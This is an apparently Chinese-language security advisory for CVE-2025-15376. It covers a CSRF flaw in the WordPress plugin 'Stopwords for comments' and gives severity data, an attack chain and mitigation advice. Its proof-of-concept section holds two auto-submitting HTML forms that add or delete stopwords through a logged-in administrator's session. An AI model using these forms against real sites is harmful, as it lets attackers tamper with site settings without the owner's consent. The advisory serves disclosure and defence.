CVE-2025-15376 WordPress Stopwords for comments插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-15376

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Stopwords for comments（WordPress插件）

漏洞概述

CVE-2025-15376是WordPress插件"Stopwords for comments"中的一个跨站请求伪造（CSRF）漏洞。该插件主要用于管理评论中的停用词过滤功能。漏洞存在于所有1.1及以前版本中，由于缺少对'set_stopwords_for_comments'和'delete_stopwords_for_comments'函数的nonce验证机制，攻击者可以构造恶意请求诱导已登录的管理员执行非预期的操作。攻击者通过诱骗管理员点击特制的链接或访问包含恶意内容的页面，利用管理员的认证会话来添加或删除停用词。虽然此漏洞不直接导致敏感数据泄露或远程代码执行，但攻击者可利用其篡改网站评论过滤规则，可能影响网站的正常运营和用户体验。CVSS评分4.3属于中等严重程度，主要因为攻击需要用户交互且无法直接获取系统权限。

技术细节

该漏洞的根本原因在于WordPress插件在处理用户请求时未实施足够的CSRF防护机制。具体来说，'set_stopwords_for_comments'和'delete_stopwords_for_comments'两个关键函数缺少wp_verify_nonce()或同等的安全令牌验证。攻击者可以利用这一缺陷构造包含恶意参数的POST请求，通过社会工程学手段诱骗管理员点击链接或访问特定页面。由于WordPress的管理员会话Cookie会被自动携带，服务器无法区分合法请求和伪造请求。攻击者可以强制添加任意停用词或删除现有停用词，从而绕过评论过滤机制或使其失效。此漏洞的利用条件包括：攻击者需要能够诱使管理员执行操作（点击链接或访问页面），管理员需保持登录状态，以及目标站点使用受影响版本的插件。攻击成功后，攻击者可修改评论过滤规则，可能导致垃圾评论泛滥或正常评论被误拦截。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单的网页，该表单指向目标WordPress站点的admin-post.php端点，携带set_stopwords_for_comments或delete_stopwords_for_comments操作参数

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导WordPress管理员访问恶意网页

STEP 3

步骤3

管理员的浏览器自动加载并提交恶意表单，利用管理员的有效会话Cookie绕过身份验证

STEP 4

步骤4

目标服务器接收请求，由于缺少nonce验证，无法识别这是伪造请求

STEP 5

步骤5

服务器执行stopwords的添加或删除操作，攻击者成功修改评论过滤规则

STEP 6

步骤6

攻击者可通过反复利用此漏洞彻底破坏评论过滤机制，导致垃圾评论泛滥或正常评论被错误拦截

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-15376 -->
<!-- This PoC demonstrates adding a stopword -->
<html>
  <body>
    <form action="http://target-site.com/wp-admin/admin-post.php" method="POST">
      <input type="hidden" name="action" value="set_stopwords_for_comments" />
      <input type="hidden" name="stopwords" value="malicious_word" />
      <input type="hidden" name="nonce" value="" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

<!-- CSRF PoC for deleting stopwords -->
<html>
  <body>
    <form action="http://target-site.com/wp-admin/admin-post.php" method="POST">
      <input type="hidden" name="action" value="delete_stopwords_for_comments" />
      <input type="hidden" name="stopwords" value="allowed_word" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

<!-- Attack flow:
1. Attacker creates malicious page with CSRF PoC
2. Tricks administrator into visiting the page
3. Browser automatically sends request with admin cookies
4. Server processes request without verifying nonce
5. Stopwords are modified as attacker intended -->

影响范围

Stopwords for comments <= 1.1

防御指南

临时缓解措施

在官方修复版本发布之前，管理员应避免点击来自不可信来源的链接，特别是要求执行管理操作的链接。可临时禁用Stopwords for comments插件或限制管理员账户的使用，定期审查评论过滤设置是否被篡改。建议网站管理员启用双因素认证以增加账户安全性，同时监控网站日志以便及时发现异常请求模式。